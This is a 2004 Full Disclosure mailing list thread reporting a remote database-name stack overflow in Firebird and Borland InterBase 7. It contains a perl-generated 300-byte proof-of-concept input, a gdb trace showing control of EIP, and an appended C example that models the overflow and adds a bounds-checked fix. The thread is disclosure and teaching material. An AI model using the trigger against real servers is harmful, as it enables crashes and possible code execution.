Full Disclosure mailing list archives

Re: Firebird [ AND Interbase 7 ] Database Remote Database Name Overflow


From: Noam Rathaus <noamr () beyondsecurity com>
Date: Thu, 3 Jun 2004 13:36:33 +0300

On Thursday 03 June 2004 05:03, KF (lists) wrote:
Someone that has had some success communicating things security-wise to
Borland may wish to contact them about this.

[root@CloneRiot bin]# rpm -ivh /root/InterBaseSS_LI-V7.1.0-1.i386.rpm

[kf@CloneRiot bin]$ pwd
/opt/interbase/bin
[kf@CloneRiot bin]$ ./gsec -database 127.0.0.1:`perl -e'print ("A"x300)'`

(gdb) c
Continuing.
[New Thread 1085279152 (LWP 21355)]
[New Thread 1095769008 (LWP 21356)]
[New Thread 1106258864 (LWP 21357)]

Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread 1085279152 (LWP 21355)]
0x41414141 in ?? ()
(gdb) bt
#0  0x41414141 in ?? ()
#1  0x41414141 in ?? ()
#2  0x41414141 in ?? ()
...
#35 0x41414141 in ?? ()
#36 0x41414141 in ?? ()
(gdb)

(gdb) i r
eax            0x0      0
ecx            0x82025e4        136324580
edx            0x0      0
ebx            0x81fe29c        136307356
esp            0x40aff5f8       0x40aff5f8
ebp            0x41414141       0x41414141
esi            0x12c    300
edi            0x40affab8       1085274808
eip            0x41414141       0x41414141
eflags         0x10246  66118

(gdb) x/1s $esp
0x40aff5f8:      'A' <repeats 144 times>

[root@CloneRiot interbase]# ./bin/ibserver
Segmentation fault
-KF

Noam Rathaus wrote:
On Sunday 02 June 2002 01:52, KF (lists) wrote:
So is this firebird specific or does it also impact Borland Interbase
users?
-KF

We haven't tested Borland's Interbase as we didn't have any installation
available for testing. However I can assume that since this vulnerability
appears in version 1.0.2, which is of very close resemblance to Borland's
Interbase sources, that the vulnerability may also affect it.
Hi,

Well it appears that the Borland version is a bit more vulnerable, or in other 
words more exploitable, as in Firebird I was unable to directly modify 
EIP, while it appears that the Borland version's EIP is easily modifiable.

Thank you for the assistance in verifying whether Borland's Interbase is also 
vulnerable.

-- 
Thanks
Noam Rathaus
CTO
Beyond Security Ltd.

Join the SecuriTeam community on Orkut:
http://www.orkut.com/Community.aspx?cmm=44441

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
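The gdb session above (EBP and EIP both 0x41414141, ESI holding 300, ESP pointing at a run of 144 'A's) is the signature of a fixed-size stack buffer being filled by an unbounded copy of the database-name part of the connect string. The C below is an added example, not code from this thread, from Firebird or from Borland's InterBase sources: it models that bug class with a simulated 32-bit frame so the overflow can be observed without crashing the process, and puts the hardened, length-checked copy next to it. The buffer size (144, taken from the `x/1s $esp` line), the seed values, the frame layout and every function name are assumptions.

```c
/* Added example, not code from the thread or from Firebird/InterBase.
 * It models the bug class KF's gdb session shows: the database part of
 * a "host:dbname" connect string copied into a fixed-size stack buffer
 * with no length check, so a long name runs over the saved EBP and the
 * return address (both 0x41414141 in the trace). Frame layout, buffer
 * size and names are assumptions, not InterBase's. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define DBNAME_MAX 144            /* assumed: x/1s $esp showed 144 'A's */
#define SEED_EBP   0xbfffd000u    /* placeholder "real" saved EBP */
#define SEED_EIP   0x08049abcu    /* placeholder "real" return address */

/* Simulated x86 frame, low to high addresses: local buffer, saved EBP,
 * return address. The copy is confined to this struct so the example
 * itself never smashes the real stack. */
struct frame {
    char     dbname[DBNAME_MAX];
    uint32_t saved_ebp;
    uint32_t saved_eip;
};

static const char *dbname_part(const char *connect)
{
    const char *colon = strchr(connect, ':');
    return colon ? colon + 1 : connect;      /* skip "host:" if present */
}

/* Vulnerable form: strcpy()-style copy, bounded only by the simulation. */
void copy_dbname_unsafe(struct frame *f, const char *connect)
{
    const char *name = dbname_part(connect);
    size_t len = strlen(name) + 1;           /* strcpy copies the NUL too */
    if (len > sizeof *f) len = sizeof *f;    /* stay inside the struct */
    memcpy((unsigned char *)f, name, len);   /* spills past dbname[] */
}

/* Hardened form: refuse names that do not fit, then copy with a bound.
 * Returns 0 on success, -1 if the name is too long. */
int copy_dbname_safe(struct frame *f, const char *connect)
{
    const char *name = dbname_part(connect);
    size_t len = strlen(name);
    if (len >= sizeof f->dbname)
        return -1;
    memcpy(f->dbname, name, len);
    f->dbname[len] = '\0';
    return 0;
}

/* Builds "127.0.0.1:" + n_a 'A's, the shape of the perl one-liner. */
size_t build_connect_string(char *out, size_t cap, size_t n_a)
{
    static const char host[] = "127.0.0.1:";
    size_t pos = strlen(host);
    if (cap < pos + n_a + 1) return 0;
    memcpy(out, host, pos);
    memset(out + pos, 'A', n_a);
    out[pos + n_a] = '\0';
    return pos + n_a;
}

static void seed_frame(struct frame *f)
{
    memset(f, 0, sizeof *f);
    f->saved_ebp = SEED_EBP;
    f->saved_eip = SEED_EIP;
}

/* Saved return address after the unsafe copy of an n_a-byte name
 * (little-endian, as on the x86 box in the trace). */
uint32_t eip_after_unsafe_copy(size_t n_a)
{
    char connect[512];
    struct frame f;
    seed_frame(&f);
    if (!build_connect_string(connect, sizeof connect, n_a)) return 0;
    copy_dbname_unsafe(&f, connect);
    return f.saved_eip;
}

/* Return code of the hardened copy for an n_a-byte name. */
int safe_copy_result(size_t n_a)
{
    char connect[512];
    struct frame f;
    seed_frame(&f);
    if (!build_connect_string(connect, sizeof connect, n_a)) return -2;
    return copy_dbname_safe(&f, connect);
}

int main(void)
{
    printf("300 A's, unsafe: eip = 0x%08x\n", (unsigned)eip_after_unsafe_copy(300));
    printf("151 A's, unsafe: eip = 0x%08x\n", (unsigned)eip_after_unsafe_copy(151));
    printf("100 A's, unsafe: eip = 0x%08x\n", (unsigned)eip_after_unsafe_copy(100));
    printf("300 A's, safe: rc = %d\n", safe_copy_result(300));
    return 0;
}
```

With 300 'A's the whole simulated frame is overwritten and the return address reads 0x41414141, matching the trace; with 151 'A's the terminating NUL lands in the top byte of the return address (0x00414141), the partial overwrite that makes such bugs harder to exploit when the attacker cannot control the last byte; with 100 'A's nothing leaves the buffer. The hardened copy rejects the 300-byte name before touching the frame, which is the check the affected code path is missing.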
